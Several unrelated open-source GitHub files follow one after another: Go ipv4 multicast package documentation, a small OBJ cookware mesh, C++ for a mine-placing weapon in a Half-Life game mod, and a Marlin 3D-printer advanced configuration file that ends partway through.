// Copyright 2012 The Go Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. // Package ipv4 implements IP-level socket options for the Internet // Protocol version 4. // // The package provides IP-level socket options that allow // manipulation of IPv4 facilities. // // The IPv4 protocol and basic host requirements for IPv4 are defined // in RFC 791 and RFC 1122. // Host extensions for multicasting and socket interface extensions // for multicast source filters are defined in RFC 1112 and RFC 3678. // IGMPv1, IGMPv2 and IGMPv3 are defined in RFC 1112, RFC 2236 and RFC // 3376. // Source-specific multicast is defined in RFC 4607. // // // Unicasting // // The options for unicasting are available for net.TCPConn, // net.UDPConn and net.IPConn which are created as network connections // that use the IPv4 transport. When a single TCP connection carrying // a data flow of multiple packets needs to indicate the flow is // important, Conn is used to set the type-of-service field on the // IPv4 header for each packet. // // ln, err := net.Listen("tcp4", "0.0.0.0:1024") // if err != nil { // // error handling // } // defer ln.Close() // for { // c, err := ln.Accept() // if err != nil { // // error handling // } // go func(c net.Conn) { // defer c.Close() // // The outgoing packets will be labeled DiffServ assured forwarding // class 1 low drop precedence, known as AF11 packets. // // if err := ipv4.NewConn(c).SetTOS(0x28); err != nil { // // error handling // } // if _, err := c.Write(data); err != nil { // // error handling // } // }(c) // } // // // Multicasting // // The options for multicasting are available for net.UDPConn and // net.IPconn which are created as network connections that use the // IPv4 transport. A few network facilities must be prepared before // you begin multicasting, at a minimum joining network interfaces and // multicast groups. // // en0, err := net.InterfaceByName("en0") // if err != nil { // // error handling // } // en1, err := net.InterfaceByIndex(911) // if err != nil { // // error handling // } // group := net.IPv4(224, 0, 0, 250) // // First, an application listens to an appropriate address with an // appropriate service port. // // c, err := net.ListenPacket("udp4", "0.0.0.0:1024") // if err != nil { // // error handling // } // defer c.Close() // // Second, the application joins multicast groups, starts listening to // the groups on the specified network interfaces. Note that the // service port for transport layer protocol does not matter with this // operation as joining groups affects only network and link layer // protocols, such as IPv4 and Ethernet. // // p := ipv4.NewPacketConn(c) // if err := p.JoinGroup(en0, &net.UDPAddr{IP: group}); err != nil { // // error handling // } // if err := p.JoinGroup(en1, &net.UDPAddr{IP: group}); err != nil { // // error handling // } // // The application might set per packet control message transmissions // between the protocol stack within the kernel. When the application // needs a destination address on an incoming packet, // SetControlMessage of PacketConn is used to enable control message // transmissions. // // if err := p.SetControlMessage(ipv4.FlagDst, true); err != nil { // // error handling // } // // The application could identify whether the received packets are // of interest by using the control message that contains the // destination address of the received packet. // // b := make([]byte, 1500) // for { // n, cm, src, err := p.ReadFrom(b) // if err != nil { // // error handling // } // if cm.Dst.IsMulticast() { // if cm.Dst.Equal(group) { // // joined group, do something // } else { // // unknown group, discard // continue // } // } // // The application can also send both unicast and multicast packets. // // p.SetTOS(0x0) // p.SetTTL(16) // if _, err := p.WriteTo(data, nil, src); err != nil { // // error handling // } // dst := &net.UDPAddr{IP: group, Port: 1024} // for _, ifi := range []*net.Interface{en0, en1} { // if err := p.SetMulticastInterface(ifi); err != nil { // // error handling // } // p.SetMulticastTTL(2) // if _, err := p.WriteTo(data, nil, dst); err != nil { // // error handling // } // } // } // // // More multicasting // // An application that uses PacketConn or RawConn may join multiple // multicast groups. For example, a UDP listener with port 1024 might // join two different groups across over two different network // interfaces by using: // // c, err := net.ListenPacket("udp4", "0.0.0.0:1024") // if err != nil { // // error handling // } // defer c.Close() // p := ipv4.NewPacketConn(c) // if err := p.JoinGroup(en0, &net.UDPAddr{IP: net.IPv4(224, 0, 0, 248)}); err != nil { // // error handling // } // if err := p.JoinGroup(en0, &net.UDPAddr{IP: net.IPv4(224, 0, 0, 249)}); err != nil { // // error handling // } // if err := p.JoinGroup(en1, &net.UDPAddr{IP: net.IPv4(224, 0, 0, 249)}); err != nil { // // error handling // } // // It is possible for multiple UDP listeners that listen on the same // UDP port to join the same multicast group. The net package will // provide a socket that listens to a wildcard address with reusable // UDP port when an appropriate multicast address prefix is passed to // the net.ListenPacket or net.ListenUDP. // // c1, err := net.ListenPacket("udp4", "224.0.0.0:1024") // if err != nil { // // error handling // } // defer c1.Close() // c2, err := net.ListenPacket("udp4", "224.0.0.0:1024") // if err != nil { // // error handling // } // defer c2.Close() // p1 := ipv4.NewPacketConn(c1) // if err := p1.JoinGroup(en0, &net.UDPAddr{IP: net.IPv4(224, 0, 0, 248)}); err != nil { // // error handling // } // p2 := ipv4.NewPacketConn(c2) // if err := p2.JoinGroup(en0, &net.UDPAddr{IP: net.IPv4(224, 0, 0, 248)}); err != nil { // // error handling // } // // Also it is possible for the application to leave or rejoin a // multicast group on the network interface. // // if err := p.LeaveGroup(en0, &net.UDPAddr{IP: net.IPv4(224, 0, 0, 248)}); err != nil { // // error handling // } // if err := p.JoinGroup(en0, &net.UDPAddr{IP: net.IPv4(224, 0, 0, 250)}); err != nil { // // error handling // } // // // Source-specific multicasting // // An application that uses PacketConn or RawConn on IGMPv3 supported // platform is able to join source-specific multicast groups. // The application may use JoinSourceSpecificGroup and // LeaveSourceSpecificGroup for the operation known as "include" mode, // // ssmgroup := net.UDPAddr{IP: net.IPv4(232, 7, 8, 9)} // ssmsource := net.UDPAddr{IP: net.IPv4(192, 168, 0, 1)}) // if err := p.JoinSourceSpecificGroup(en0, &ssmgroup, &ssmsource); err != nil { // // error handling // } // if err := p.LeaveSourceSpecificGroup(en0, &ssmgroup, &ssmsource); err != nil { // // error handling // } // // or JoinGroup, ExcludeSourceSpecificGroup, // IncludeSourceSpecificGroup and LeaveGroup for the operation known // as "exclude" mode. // // exclsource := net.UDPAddr{IP: net.IPv4(192, 168, 0, 254)} // if err := p.JoinGroup(en0, &ssmgroup); err != nil { // // error handling // } // if err := p.ExcludeSourceSpecificGroup(en0, &ssmgroup, &exclsource); err != nil { // // error handling // } // if err := p.LeaveGroup(en0, &ssmgroup); err != nil { // // error handling // } // // Note that it depends on each platform implementation what happens // when an application which runs on IGMPv3 unsupported platform uses // JoinSourceSpecificGroup and LeaveSourceSpecificGroup. // In general the platform tries to fall back to conversations using // IGMPv1 or IGMPv2 and starts to listen to multicast traffic. // In the fallback case, ExcludeSourceSpecificGroup and // IncludeSourceSpecificGroup may return an error. package ipv4 // import "golang.org/x/net/ipv4" // BUG(mikio): This package is not implemented on NaCl and Plan 9.
{ "pile_set_name": "Github" }
mtllib dinnerware.mtl usemtl pan_tefal v 0.048268 -0.085308 0.060000 v 0.051940 -0.089963 0.060000 v 0.029150 -0.050489 0.000000 v 0.027560 -0.047735 0.000000 v -0.048765 -0.086152 0.060600 v -0.052459 -0.090862 0.060600 v -0.029442 -0.050994 0.000000 v -0.027836 -0.048213 0.000000 vn 0.404852 0.441710 0.800617 vn -0.882548 -0.029017 0.469326 vn 0.182767 0.981935 0.048984 vn -0.768458 0.392626 -0.505290 vn 0.592713 0.805382 -0.007215 vn 0.400028 0.869068 0.291031 vn -0.642772 0.691166 0.330355 vn 0.104670 0.652086 -0.750885 f 1//1 2//2 4//4 f 1//1 5//5 2//2 f 1//1 6//6 2//2 f 1//1 4//4 5//5 f 1//1 5//5 6//6 f 2//2 3//3 4//4 f 2//2 7//7 3//3 f 2//2 5//5 6//6 f 2//2 6//6 7//7 f 3//3 7//7 4//4 f 3//3 8//8 4//4 f 3//3 7//7 8//8 f 4//4 8//8 5//5 f 4//4 7//7 8//8 f 5//5 8//8 6//6 f 6//6 8//8 7//7
{ "pile_set_name": "Github" }
//======== (C) Copyright 2002 Charles G. Cleveland All rights reserved. ========= // // The copyright to the contents herein is the property of Charles G. Cleveland. // The contents may be used and/or copied only with the written permission of // Charles G. Cleveland, or in accordance with the terms and conditions stipulated in // the agreement/contract under which the contents have been supplied. // // Purpose: This is the weapon that marines use to deploy mines (not the mines themselves) // // $Workfile: AvHMine.cpp $ // $Date: 2002/10/25 21:48:21 $ // //------------------------------------------------------------------------------- // $Log: AvHMine.cpp,v $ // Revision 1.10 2002/10/25 21:48:21 Flayra // - Fixe for wrong player model when holding mines // // Revision 1.9 2002/10/16 20:53:09 Flayra // - Removed weapon upgrade sounds // // Revision 1.8 2002/10/16 01:01:58 Flayra // - Fixed mines being resupplied from armory // // Revision 1.7 2002/10/03 18:46:17 Flayra // - Added heavy view model // // Revision 1.6 2002/07/24 19:09:17 Flayra // - Linux issues // // Revision 1.5 2002/07/24 18:55:52 Flayra // - Linux case sensitivity stuff // // Revision 1.4 2002/07/24 18:45:42 Flayra // - Linux and scripting changes // // Revision 1.3 2002/06/25 17:47:14 Flayra // - Fixed mine, refactored for new disabled/enabled state // // Revision 1.2 2002/06/03 16:37:31 Flayra // - Constants and tweaks to make weapon anims and times correct with new artwork, added different deploy times (this should be refactored a bit more) // // Revision 1.1 2002/05/23 02:33:42 Flayra // - Post-crash checkin. Restored @Backup from around 4/16. Contains changes for last four weeks of development. // //=============================================================================== #include "mod/AvHMarineWeapons.h" #include "mod/AvHPlayer.h" #ifdef AVH_CLIENT #include "cl_dll/eventscripts.h" #include "cl_dll/in_defs.h" #include "cl_dll/wrect.h" #include "cl_dll/cl_dll.h" #endif #include "common/hldm.h" #include "common/event_api.h" #include "common/event_args.h" #include "common/vector_util.h" #include "mod/AvHMarineWeapons.h" #include "mod/AvHMarineEquipmentConstants.h" #ifdef AVH_SERVER #include "mod/AvHGamerules.h" #include "mod/AvHMarineEquipment.h" #include "mod/AvHSharedUtil.h" #include "mod/AvHServerUtil.h" #endif LINK_ENTITY_TO_CLASS(kwMine, AvHMine); void AvHMine::DeductCostForShot(void) { AvHBasePlayerWeapon::DeductCostForShot(); //this->m_pPlayer->m_rgAmmo[m_iPrimaryAmmoType]--; //if(this->m_pPlayer->m_rgAmmo[m_iPrimaryAmmoType] <= 0) if(!this->m_iClip) { // no more mines! RetireWeapon(); } } bool AvHMine::GetCanBeResupplied() const { return false; } int AvHMine::GetDeployAnimation() const { return 2; } char* AvHMine::GetHeavyViewModel() const { return kTripmineHVVModel; } char* AvHMine::GetPlayerModel() const { return kTripminePModel; } char* AvHMine::GetWorldModel() const { return kTripmineWModel; } char* AvHMine::GetViewModel() const { return kTripmineVModel; } int AvHMine::GetShootAnimation() const { // Return deploy animation for now, this should play fire animation, then a little later, play the deploy animation return 2; } void AvHMine::Holster(int skiplocal) { if(!this->m_iClip) { // Out of mines SetThink(&AvHMine::DestroyItem); this->pev->nextthink = gpGlobals->time + 0.1; } AvHMarineWeapon::Holster(skiplocal); } void AvHMine::Init() { this->mRange = kMineRange; this->mDamage = 0; // What to do here? Is it taking damage from CGrenade? } bool AvHMine::ProcessValidAttack(void) { bool theSuccess = AvHMarineWeapon::ProcessValidAttack(); // This test is not necessary since the new collision code makes it so // that interpenetrating objects are not a problem. /* if(theSuccess) { #ifdef AVH_SERVER theSuccess = false; Vector theDropLocation; Vector theDropAngles; if(this->GetDropLocation(theDropLocation, &theDropAngles)) { Vector theMineMinSize = Vector (kMineMinSize); Vector theMineMaxSize = Vector (kMineMaxSize); // TODO: Rotate extents by theDropAngles, to test bounding box extents as the mine would be placed if(AvHSHUGetIsAreaFree(theDropLocation, theMineMinSize, theMineMaxSize)) { theSuccess = true; } } #endif } */ #ifdef AVH_SERVER if(theSuccess) { Vector theMineOrigin; Vector theMineAngles; theSuccess = this->GetDropLocation(theMineOrigin, &theMineAngles); } #endif return theSuccess; } #ifdef AVH_SERVER bool AvHMine::GetDropLocation(Vector& outLocation, Vector* outAngles) const { bool theSuccess = false; UTIL_MakeVectors( m_pPlayer->pev->v_angle + m_pPlayer->pev->punchangle ); Vector vecSrc = m_pPlayer->GetGunPosition( ); Vector vecAiming = gpGlobals->v_forward; TraceResult tr; UTIL_TraceLine( vecSrc, vecSrc + vecAiming*this->mRange, dont_ignore_monsters, ENT( m_pPlayer->pev ), &tr ); if (tr.flFraction < 1.0) { CBaseEntity* theEntity = CBaseEntity::Instance( tr.pHit ); // puzl: 981 // Mines can't be planted on players or buildings if (!dynamic_cast<AvHDeployedMine*>(theEntity) && !dynamic_cast<AvHPlayer *>(theEntity) && !dynamic_cast<AvHBaseBuildable *>(theEntity)) { int kOffset = 8; Vector thePotentialOrigin = tr.vecEndPos + tr.vecPlaneNormal * kOffset; BaseEntityListType theEntityList; theEntityList.push_back(theEntity); // Make sure there isn't an entity nearby that this would block theEntity = NULL; const int kMineSearchRadius = 15; while((theEntity = UTIL_FindEntityInSphere(theEntity, thePotentialOrigin, kMineSearchRadius)) != NULL) { theEntityList.push_back(theEntity); } // For the mine placement to be valid, the entity it hit, and all the entities nearby must be valid and non-blocking theSuccess = true; for(BaseEntityListType::iterator theIter = theEntityList.begin(); theIter != theEntityList.end(); theIter++) { // puzl: 225 make sure there are no mines within kMineSearchRadius of each other ( 15 units ) CBaseEntity* theCurrentEntity = *theIter; if(!theCurrentEntity || (theCurrentEntity->pev->flags & FL_CONVEYOR) || AvHSUGetIsExternalClassName(STRING(theCurrentEntity->pev->classname)) || dynamic_cast<CBaseDoor*>(theCurrentEntity) || dynamic_cast<CRotDoor*>(theCurrentEntity) || dynamic_cast<AvHDeployedMine*>(theCurrentEntity) ) { theSuccess = false; break; } } if(theSuccess) { VectorCopy(thePotentialOrigin, outLocation); if(outAngles) { VectorCopy(UTIL_VecToAngles( tr.vecPlaneNormal ), *outAngles) } } } } return theSuccess; } #endif void AvHMine::FireProjectiles(void) { #ifdef AVH_SERVER Vector theMineOrigin; Vector theMineAngles; if(this->GetDropLocation(theMineOrigin, &theMineAngles)) { GetGameRules()->MarkDramaticEvent(kMinePlacePriority, this->m_pPlayer); AvHDeployedMine* theMine = dynamic_cast<AvHDeployedMine*>(CBaseEntity::Create( kwsDeployedMine, theMineOrigin, theMineAngles, m_pPlayer->edict() )); ASSERT(theMine); // Set the team so it doesn't blow us up, remember the owner so proper credit can be given theMine->pev->team = m_pPlayer->pev->team; //theMine->pev->owner = m_pPlayer->edict(); theMine->SetPlacer(this->m_pPlayer->pev); // Set it as a marine item so it gets damage upgrades // Set any team-wide upgrades AvHTeam* theTeam = GetGameRules()->GetTeam(AvHTeamNumber(m_pPlayer->pev->team)); ASSERT(theTeam); theMine->pev->iuser4 |= theTeam->GetTeamWideUpgrades(); } #endif } int AvHMine::GetBarrelLength() const { return kMineBarrellLength; } float AvHMine::GetRateOfFire() const { return kMineROF; } bool AvHMine::GetFiresUnderwater() const { return true; } BOOL AvHMine::PlayEmptySound() { // None return 0; } void AvHMine::Precache() { AvHMarineWeapon::Precache(); UTIL_PrecacheOther(kwsDeployedMine); this->mEvent = PRECACHE_EVENT(1, kWeaponAnimationEvent); } bool AvHMine::Resupply() { return false; } void AvHMine::Spawn() { this->Precache(); AvHMarineWeapon::Spawn(); this->m_iId = AVH_WEAPON_MINE; // Set our class name this->pev->classname = MAKE_STRING(kwsMine); SET_MODEL(ENT(pev), kTripmineW2Model); FallInit();// get ready to fall down. int theNumMines = BALANCE_VAR(kMineMaxAmmo); #ifdef AVH_SERVER if(GetGameRules()->GetIsCombatMode()) { theNumMines = BALANCE_VAR(kMineMaxAmmoCombat); } #endif this->m_iDefaultAmmo = theNumMines; } bool AvHMine::UsesAmmo(void) const { return true; } BOOL AvHMine::UseDecrement(void) { return true; }
{ "pile_set_name": "Github" }
/** * Marlin 3D Printer Firmware * Copyright (C) 2016 MarlinFirmware [https://github.com/MarlinFirmware/Marlin] * * Based on Sprinter and grbl. * Copyright (C) 2011 Camiel Gubbels / Erik van der Zalm * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <http://www.gnu.org/licenses/>. * */ // Example configuration file for OpenBeam Kossel Pro // tested on 2015-05-19 by @Wackerbarth // using Arduino 1.6.5 (Mac) /** * Configuration_adv.h * * Advanced settings. * Only change these if you know exactly what you're doing. * Some of these settings can damage your printer if improperly set! * * Basic settings can be found in Configuration.h * */ #ifndef CONFIGURATION_ADV_H #define CONFIGURATION_ADV_H #define CONFIGURATION_ADV_H_VERSION 010109 // @section temperature //=========================================================================== //=============================Thermal Settings ============================ //=========================================================================== // // Hephestos 2 24V heated bed upgrade kit. // https://store.bq.com/en/heated-bed-kit-hephestos2 // //#define HEPHESTOS2_HEATED_BED_KIT #if ENABLED(HEPHESTOS2_HEATED_BED_KIT) #undef TEMP_SENSOR_BED #define TEMP_SENSOR_BED 70 #define HEATER_BED_INVERTING true #endif #if DISABLED(PIDTEMPBED) #define BED_CHECK_INTERVAL 5000 // ms between checks in bang-bang control #if ENABLED(BED_LIMIT_SWITCHING) #define BED_HYSTERESIS 2 // Only disable heating if T>target+BED_HYSTERESIS and enable heating if T>target-BED_HYSTERESIS #endif #endif /** * Thermal Protection provides additional protection to your printer from damage * and fire. Marlin always includes safe min and max temperature ranges which * protect against a broken or disconnected thermistor wire. * * The issue: If a thermistor falls out, it will report the much lower * temperature of the air in the room, and the the firmware will keep * the heater on. * * The solution: Once the temperature reaches the target, start observing. * If the temperature stays too far below the target (hysteresis) for too * long (period), the firmware will halt the machine as a safety precaution. * * If you get false positives for "Thermal Runaway", increase * THERMAL_PROTECTION_HYSTERESIS and/or THERMAL_PROTECTION_PERIOD */ #if ENABLED(THERMAL_PROTECTION_HOTENDS) #define THERMAL_PROTECTION_PERIOD 40 // Seconds #define THERMAL_PROTECTION_HYSTERESIS 4 // Degrees Celsius /** * Whenever an M104, M109, or M303 increases the target temperature, the * firmware will wait for the WATCH_TEMP_PERIOD to expire. If the temperature * hasn't increased by WATCH_TEMP_INCREASE degrees, the machine is halted and * requires a hard reset. This test restarts with any M104/M109/M303, but only * if the current temperature is far enough below the target for a reliable * test. * * If you get false positives for "Heating failed", increase WATCH_TEMP_PERIOD * and/or decrease WATCH_TEMP_INCREASE. WATCH_TEMP_INCREASE should not be set * below 2. */ #define WATCH_TEMP_PERIOD 20 // Seconds #define WATCH_TEMP_INCREASE 2 // Degrees Celsius #endif /** * Thermal Protection parameters for the bed are just as above for hotends. */ #if ENABLED(THERMAL_PROTECTION_BED) #define THERMAL_PROTECTION_BED_PERIOD 20 // Seconds #define THERMAL_PROTECTION_BED_HYSTERESIS 2 // Degrees Celsius /** * As described above, except for the bed (M140/M190/M303). */ #define WATCH_BED_TEMP_PERIOD 60 // Seconds #define WATCH_BED_TEMP_INCREASE 2 // Degrees Celsius #endif #if ENABLED(PIDTEMP) // this adds an experimental additional term to the heating power, proportional to the extrusion speed. // if Kc is chosen well, the additional required power due to increased melting should be compensated. //#define PID_EXTRUSION_SCALING #if ENABLED(PID_EXTRUSION_SCALING) #define DEFAULT_Kc (100) //heating power=Kc*(e_speed) #define LPQ_MAX_LEN 50 #endif #endif /** * Automatic Temperature: * The hotend target temperature is calculated by all the buffered lines of gcode. * The maximum buffered steps/sec of the extruder motor is called "se". * Start autotemp mode with M109 S<mintemp> B<maxtemp> F<factor> * The target temperature is set to mintemp+factor*se[steps/sec] and is limited by * mintemp and maxtemp. Turn this off by executing M109 without F* * Also, if the temperature is set to a value below mintemp, it will not be changed by autotemp. * On an Ultimaker, some initial testing worked with M109 S215 B260 F1 in the start.gcode */ #define AUTOTEMP #if ENABLED(AUTOTEMP) #define AUTOTEMP_OLDWEIGHT 0.98 #endif // Show extra position information in M114 //#define M114_DETAIL // Show Temperature ADC value // Enable for M105 to include ADC values read from temperature sensors. //#define SHOW_TEMP_ADC_VALUES /** * High Temperature Thermistor Support * * Thermistors able to support high temperature tend to have a hard time getting * good readings at room and lower temperatures. This means HEATER_X_RAW_LO_TEMP * will probably be caught when the heating element first turns on during the * preheating process, which will trigger a min_temp_error as a safety measure * and force stop everything. * To circumvent this limitation, we allow for a preheat time (during which, * min_temp_error won't be triggered) and add a min_temp buffer to handle * aberrant readings. * * If you want to enable this feature for your hotend thermistor(s) * uncomment and set values > 0 in the constants below */ // The number of consecutive low temperature errors that can occur // before a min_temp_error is triggered. (Shouldn't be more than 10.) //#define MAX_CONSECUTIVE_LOW_TEMPERATURE_ERROR_ALLOWED 0 // The number of milliseconds a hotend will preheat before starting to check // the temperature. This value should NOT be set to the time it takes the // hot end to reach the target temperature, but the time it takes to reach // the minimum temperature your thermistor can read. The lower the better/safer. // This shouldn't need to be more than 30 seconds (30000) //#define MILLISECONDS_PREHEAT_TIME 0 // @section extruder // Extruder runout prevention. // If the machine is idle and the temperature over MINTEMP // then extrude some filament every couple of SECONDS. //#define EXTRUDER_RUNOUT_PREVENT #if ENABLED(EXTRUDER_RUNOUT_PREVENT) #define EXTRUDER_RUNOUT_MINTEMP 190 #define EXTRUDER_RUNOUT_SECONDS 30 #define EXTRUDER_RUNOUT_SPEED 1500 // mm/m #define EXTRUDER_RUNOUT_EXTRUDE 5 // mm #endif // @section temperature // Calibration for AD595 / AD8495 sensor to adjust temperature measurements. // The final temperature is calculated as (measuredTemp * GAIN) + OFFSET. #define TEMP_SENSOR_AD595_OFFSET 0.0 #define TEMP_SENSOR_AD595_GAIN 1.0 #define TEMP_SENSOR_AD8495_OFFSET 0.0 #define TEMP_SENSOR_AD8495_GAIN 1.0 /** * Controller Fan * To cool down the stepper drivers and MOSFETs. * * The fan will turn on automatically whenever any stepper is enabled * and turn off after a set period after all steppers are turned off. */ //#define USE_CONTROLLER_FAN #if ENABLED(USE_CONTROLLER_FAN) //#define CONTROLLER_FAN_PIN -1 // Set a custom pin for the controller fan #define CONTROLLERFAN_SECS 60 // Duration in seconds for the fan to run after all motors are disabled #define CONTROLLERFAN_SPEED 255 // 255 == full speed #endif // When first starting the main fan, run it at full speed for the // given number of milliseconds. This gets the fan spinning reliably // before setting a PWM value. (Does not work with software PWM for fan on Sanguinololu) //#define FAN_KICKSTART_TIME 100 /** * PWM Fan Scaling * * Define the min/max speeds for PWM fans (as set with M106). * * With these options the M106 0-255 value range is scaled to a subset * to ensure that the fan has enough power to spin, or to run lower * current fans with higher current. (e.g., 5V/12V fans with 12V/24V) * Value 0 always turns off the fan. * * Define one or both of these to override the default 0-255 range. */ //#define FAN_MIN_PWM 50 //#define FAN_MAX_PWM 128 // @section extruder /** * Extruder cooling fans * * Extruder auto fans automatically turn on when their extruders' * temperatures go above EXTRUDER_AUTO_FAN_TEMPERATURE. * * Your board's pins file specifies the recommended pins. Override those here * or set to -1 to disable completely. * * Multiple extruders can be assigned to the same pin in which case * the fan will turn on when any selected extruder is above the threshold. */ #define E0_AUTO_FAN_PIN -1 #define E1_AUTO_FAN_PIN -1 #define E2_AUTO_FAN_PIN -1 #define E3_AUTO_FAN_PIN -1 #define E4_AUTO_FAN_PIN -1 #define CHAMBER_AUTO_FAN_PIN -1 #define EXTRUDER_AUTO_FAN_TEMPERATURE 50 #define EXTRUDER_AUTO_FAN_SPEED 255 // == full speed /** * Part-Cooling Fan Multiplexer * * This feature allows you to digitally multiplex the fan output. * The multiplexer is automatically switched at tool-change. * Set FANMUX[012]_PINs below for up to 2, 4, or 8 multiplexed fans. */ #define FANMUX0_PIN -1 #define FANMUX1_PIN -1 #define FANMUX2_PIN -1 /** * M355 Case Light on-off / brightness */ //#define CASE_LIGHT_ENABLE #if ENABLED(CASE_LIGHT_ENABLE) //#define CASE_LIGHT_PIN 4 // Override the default pin if needed #define INVERT_CASE_LIGHT false // Set true if Case Light is ON when pin is LOW #define CASE_LIGHT_DEFAULT_ON true // Set default power-up state on #define CASE_LIGHT_DEFAULT_BRIGHTNESS 105 // Set default power-up brightness (0-255, requires PWM pin) //#define MENU_ITEM_CASE_LIGHT // Add a Case Light option to the LCD main menu //#define CASE_LIGHT_USE_NEOPIXEL // Use Neopixel LED as case light, requires NEOPIXEL_LED. #if ENABLED(CASE_LIGHT_USE_NEOPIXEL) #define CASE_LIGHT_NEOPIXEL_COLOR { 255, 255, 255, 255 } // { Red, Green, Blue, White } #endif #endif //=========================================================================== //============================ Mechanical Settings ========================== //=========================================================================== // @section homing // If you want endstops to stay on (by default) even when not homing // enable this option. Override at any time with M120, M121. //#define ENDSTOPS_ALWAYS_ON_DEFAULT // @section extras //#define Z_LATE_ENABLE // Enable Z the last moment. Needed if your Z driver overheats. /** * Dual Steppers / Dual Endstops * * This section will allow you to use extra E drivers to drive a second motor for X, Y, or Z axes. * * For example, set X_DUAL_STEPPER_DRIVERS setting to use a second motor. If the motors need to * spin in opposite directions set INVERT_X2_VS_X_DIR. If the second motor needs its own endstop * set X_DUAL_ENDSTOPS. This can adjust for "racking." Use X2_USE_ENDSTOP to set the endstop plug * that should be used for the second endstop. Extra endstops will appear in the output of 'M119'. * * Use X_DUAL_ENDSTOP_ADJUSTMENT to adjust for mechanical imperfection. After homing both motors * this offset is applied to the X2 motor. To find the offset home the X axis, and measure the error * in X2. Dual endstop offsets can be set at runtime with 'M666 X<offset> Y<offset> Z<offset>'. */ //#define X_DUAL_STEPPER_DRIVERS #if ENABLED(X_DUAL_STEPPER_DRIVERS) #define INVERT_X2_VS_X_DIR true // Set 'true' if X motors should rotate in opposite directions //#define X_DUAL_ENDSTOPS #if ENABLED(X_DUAL_ENDSTOPS) #define X2_USE_ENDSTOP _XMAX_ #define X_DUAL_ENDSTOPS_ADJUSTMENT 0 #endif #endif //#define Y_DUAL_STEPPER_DRIVERS #if ENABLED(Y_DUAL_STEPPER_DRIVERS) #define INVERT_Y2_VS_Y_DIR true // Set 'true' if Y motors should rotate in opposite directions //#define Y_DUAL_ENDSTOPS #if ENABLED(Y_DUAL_ENDSTOPS) #define Y2_USE_ENDSTOP _YMAX_ #define Y_DUAL_ENDSTOPS_ADJUSTMENT 0 #endif #endif //#define Z_DUAL_STEPPER_DRIVERS #if ENABLED(Z_DUAL_STEPPER_DRIVERS) //#define Z_DUAL_ENDSTOPS #if ENABLED(Z_DUAL_ENDSTOPS) #define Z2_USE_ENDSTOP _XMAX_ #define Z_DUAL_ENDSTOPS_ADJUSTMENT 0 #endif #endif /** * Dual X Carriage * * This setup has two X carriages that can move independently, each with its own hotend. * The carriages can be used to print an object with two colors or materials, or in * "duplication mode" it can print two identical or X-mirrored objects simultaneously. * The inactive carriage is parked automatically to prevent oozing. * X1 is the left carriage, X2 the right. They park and home at opposite ends of the X axis. * By default the X2 stepper is assigned to the first unused E plug on the board. */ //#define DUAL_X_CARRIAGE #if ENABLED(DUAL_X_CARRIAGE) #define X1_MIN_POS X_MIN_POS // set minimum to ensure first x-carriage doesn't hit the parked second X-carriage #define X1_MAX_POS X_BED_SIZE // set maximum to ensure first x-carriage doesn't hit the parked second X-carriage #define X2_MIN_POS 80 // set minimum to ensure second x-carriage doesn't hit the parked first X-carriage #define X2_MAX_POS 353 // set maximum to the distance between toolheads when both heads are homed #define X2_HOME_DIR 1 // the second X-carriage always homes to the maximum endstop position #define X2_HOME_POS X2_MAX_POS // default home position is the maximum carriage position // However: In this mode the HOTEND_OFFSET_X value for the second extruder provides a software // override for X2_HOME_POS. This also allow recalibration of the distance between the two endstops // without modifying the firmware (through the "M218 T1 X???" command). // Remember: you should set the second extruder x-offset to 0 in your slicer. // There are a few selectable movement modes for dual x-carriages using M605 S<mode> // Mode 0 (DXC_FULL_CONTROL_MODE): Full control. The slicer has full control over both x-carriages and can achieve optimal travel results // as long as it supports dual x-carriages. (M605 S0) // Mode 1 (DXC_AUTO_PARK_MODE) : Auto-park mode. The firmware will automatically park and unpark the x-carriages on tool changes so // that additional slicer support is not required. (M605 S1) // Mode 2 (DXC_DUPLICATION_MODE) : Duplication mode. The firmware will transparently make the second x-carriage and extruder copy all // actions of the first x-carriage. This allows the printer to print 2 arbitrary items at // once. (2nd extruder x offset and temp offset are set using: M605 S2 [Xnnn] [Rmmm]) // This is the default power-up mode which can be later using M605. #define DEFAULT_DUAL_X_CARRIAGE_MODE DXC_FULL_CONTROL_MODE // Default settings in "Auto-park Mode" #define TOOLCHANGE_PARK_ZLIFT 0.2 // the distance to raise Z axis when parking an extruder #define TOOLCHANGE_UNPARK_ZLIFT 1 // the distance to raise Z axis when unparking an extruder // Default x offset in duplication mode (typically set to half print bed width) #define DEFAULT_DUPLICATION_X_OFFSET 100 #endif // DUAL_X_CARRIAGE // Activate a solenoid on the active extruder with M380. Disable all with M381. // Define SOL0_PIN, SOL1_PIN, etc., for each extruder that has a solenoid. //#define EXT_SOLENOID // @section homing // Homing hits each endstop, retracts by these distances, then does a slower bump. #define X_HOME_BUMP_MM 5 #define Y_HOME_BUMP_MM 5 #define Z_HOME_BUMP_MM 5 // deltas need the same for all three axes #define HOMING_BUMP_DIVISOR { 10, 10, 10 } // Re-Bump Speed Divisor (Divides the Homing Feedrate) //#define QUICK_HOME // If homing includes X and Y, do a diagonal move initially // When G28 is called, this option will make Y home before X //#define HOME_Y_BEFORE_X // Enable this if X or Y can't home without homing the other axis first. //#define CODEPENDENT_XY_HOMING // @section machine #define AXIS_RELATIVE_MODES {false, false, false, false} // Allow duplication mode with a basic dual-nozzle extruder //#define DUAL_NOZZLE_DUPLICATION_MODE // By default pololu step drivers require an active high signal. However, some high power drivers require an active low signal as step. #define INVERT_X_STEP_PIN false #define INVERT_Y_STEP_PIN false #define INVERT_Z_STEP_PIN false #define INVERT_E_STEP_PIN false // Default stepper release if idle. Set to 0 to deactivate. // Steppers will shut down DEFAULT_STEPPER_DEACTIVE_TIME seconds after the last move when DISABLE_INACTIVE_? is true. // Time can be set by M18 and M84. #define DEFAULT_STEPPER_DEACTIVE_TIME 60 #define DISABLE_INACTIVE_X true #define DISABLE_INACTIVE_Y true #define DISABLE_INACTIVE_Z true // set to false if the nozzle will fall down on your printed part when print has finished. #define DISABLE_INACTIVE_E true #define DEFAULT_MINIMUMFEEDRATE 0.0 // minimum feedrate #define DEFAULT_MINTRAVELFEEDRATE 0.0 //#define 